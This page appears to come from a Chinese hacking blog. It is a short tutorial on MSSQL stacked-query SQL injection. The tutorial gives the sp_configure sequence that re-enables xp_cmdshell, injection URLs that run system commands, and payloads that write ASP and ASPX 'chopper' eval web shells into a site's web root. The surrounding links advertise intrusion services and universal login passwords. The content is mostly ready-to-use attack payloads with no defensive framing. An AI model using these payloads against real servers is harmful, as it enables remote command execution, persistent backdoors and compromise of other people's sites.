欢迎来到【血梦博客】 今天是:2021年03月08日 星期一
站长联系QQ:635948183
在SQLSERVER中是可以执行多行操作的
两条SQL语句是用分号隔开
select * from art; select * from admin
xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。
如果用户拥有管理员sa权限则可以用sp_configure 重新开启它。
;EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
命令解释
EXEC sp_configure 'show advancedoptions',1//允许修改高级参数
RECONFIGUREEXEC sp_configure'xp_cmdshell',1 //打开xp_cmdshell扩展RECONFIGURE
执行系统命令
EXEC master.dbo.xp_cmdshell 'ipconfig'
开始xp_cmdshell
http://www.demo1.com/index.aspx?id=1;EXECsp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure'xp_cmdshell', 1;RECONFIGURE;
getshell
http://www.demo1.com/index.aspx?id=1;execmaster..xp_cmdshell 'echo ^<%eval request(chr(35))%^> >C:\inetpub\wwwroot\www.demo1.com\2.asp' -- exec master..xp_cmdshell 'echo ^<%evalrequest(chr(35))%^> > C:\inetpub\wwwroot\www.demo1.com\2.asp'-- exec master..xp_cmdshell 'echo ^<%@ PageLanguage="Jscript"%^>^<%eval(Request.Item["chopper"],"unsafe");%^>>D:\2.aspx'– http://www.demo1.com/index.aspx?id=1;execmaster..xp_cmdshell 'echo ^<%@ PageLanguage="Jscript"%^>^<%eval(Request.Item["chopper"],"unsafe");%^>>C:\inetpub\wwwroot\www.demo1.com\2.aspx'–
执行系统命令 把命令结果输出到指定文件
http://www.demo1.com/index.aspx?id=1;EXECmaster.dbo.xp_cmdshell 'ipconfig>>C:\inetpub\wwwroot\www.demo1.com\ip.txt' http://www.demo1.com/index.aspx?id=1;EXECmaster.dbo.xp_cmdshell 'whoami >>C:\inetpub\wwwroot\www.demo1.com\ip.txt'
猜你还喜欢
- 07-08八年专业安全团队承接渗透入侵维护服务
- 08-06SQLMAP的注入命令以及使用方法
- 08-03白帽故事汇:网络安全战士从来不是「男生」的专利
- 07-27编辑器漏洞手册
- 07-12web安全之如何全面发现系统后台
- 02-22常见Web源码泄露总结
- 07-25网站后台登陆万能密码
- 07-23破解emlog收费模板“Begin”
- 01-12批量检测SQL注入
- 01-22Apache Solr远程代码执行漏洞(CVE-2017-12629)从利用到入侵检测
- 随机文章
-
- Scrounger:一款功能强大的移动端应用程序安全测试套件
- NSA新型APT框架曝光:DarkPulsar
- NTLM中继攻击结合MSSQL调用xp_dirtree拿下MSSQL最高权限
- 远控木马盗用网易官方签名
- Linux应急响应(三):挖矿病毒
- 寻找活动目录中使用可逆加密存储密码的账户
- 变种XSS:持久控制
- Webshell安全检测篇
- 创造tips的秘籍——PHP回调后门
- 快讯 | 国泰航空数据泄露,940万乘客受影响
- 看我如何在Weblogic里捡一个XXE(CVE-2018-3246)
- 浅谈大型互联网的安全
- PHP安全编码
- 得到内网域管理员的5种常见方法
- 通杀绝⼤多数交易平台的Tradingview Dom XSS漏洞分析
- 如何使用Windows Library文件进行持久化
- 一键安装藏隐患,phpStudy批量入侵的分析与溯源
- meterpreter必知必会的15个命令
- 记一次远程命令执行漏洞的挖掘过程
- 赛门铁克邮件网关身份验证绕过漏洞(CVE-2018-12242)分析
- 热门文章
-
- 八年专业安全团队承接渗透入侵维护服务
- Emlog黑客站模板“Milw0rm”发布
- Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
- SQLMAP的注入命令以及使用方法
- 白帽故事汇:网络安全战士从来不是「男生」的专利
- 编辑器漏洞手册
- web安全之如何全面发现系统后台
- 常见Web源码泄露总结
- 渗透测试培训(第五期)
- 深入理解JAVA反序列化漏洞
- cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
- 网站后台登陆万能密码
- 黑麒麟2016渗透培训系列教程
- 破解emlog收费模板“Begin”
- 那些强悍的PHP一句话后门
- Android平台渗透测试套件zANTI v2.5发布(含详细说明)
- 渗透工具BackTrack与KaliLinux全套视频教程
- Python列为黑客应该学的四种编程语言之一 初学者该怎么学
- CVE-2017-11882漏洞复现和利用
- 恶意程序报告在线查询工具
文章存档
- 2021年3月(4)
- 2020年12月(4)
- 2020年11月(5)
- 2020年10月(8)
- 2020年9月(8)
- 2020年8月(20)
- 2020年7月(47)
- 2020年6月(70)
- 2020年5月(41)
- 2020年4月(21)
- 2020年3月(120)
- 2020年2月(26)
- 2019年12月(12)
- 2019年11月(13)
- 2019年10月(17)
- 2019年9月(15)
- 2019年8月(13)
- 2019年7月(15)
- 2019年6月(15)
- 2019年5月(19)
- 2019年4月(23)
- 2019年3月(19)
- 2019年2月(11)
- 2019年1月(29)
- 2018年12月(24)
- 2018年11月(56)
- 2018年10月(79)
- 2018年9月(20)
- 2018年8月(17)
- 2018年7月(16)
- 2018年6月(7)
- 2018年5月(10)
- 2018年3月(6)
- 2018年2月(2)
- 2018年1月(11)
- 2017年11月(18)
- 2017年10月(6)
- 2017年9月(8)
- 2017年8月(7)
- 2017年7月(7)
- 2017年6月(15)
- 2017年5月(30)
- 2017年4月(7)
- 2017年3月(1)
- 2017年2月(4)
- 2017年1月(1)
- 2016年12月(3)
- 2016年11月(7)
- 2016年10月(6)
- 2016年9月(6)
- 2016年8月(102)
- 2016年7月(24)
- 2013年7月(1)
- 文章标签
-